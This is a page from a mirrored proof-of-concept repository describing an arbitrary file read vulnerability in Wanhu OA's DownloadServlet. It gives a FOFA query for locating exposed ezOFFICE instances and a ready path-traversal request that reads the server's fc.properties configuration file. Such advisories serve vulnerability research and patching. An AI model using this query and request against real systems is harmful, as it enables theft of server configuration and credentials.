admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/万户OA DownloadServlet 任意文件读取漏洞.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

547 B
Raw Blame History

万户OA DownloadServlet 任意文件读取漏洞

漏洞描述

万户OA DownloadServlet接口存在任意文件读取漏洞攻击者通过漏洞可以读取服务器中的敏感文件获取敏感信息

漏洞影响

万户OA

FOFA

app="万户网络-ezOFFICE"

漏洞复现

产品页面

1

验证POC

/defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2

2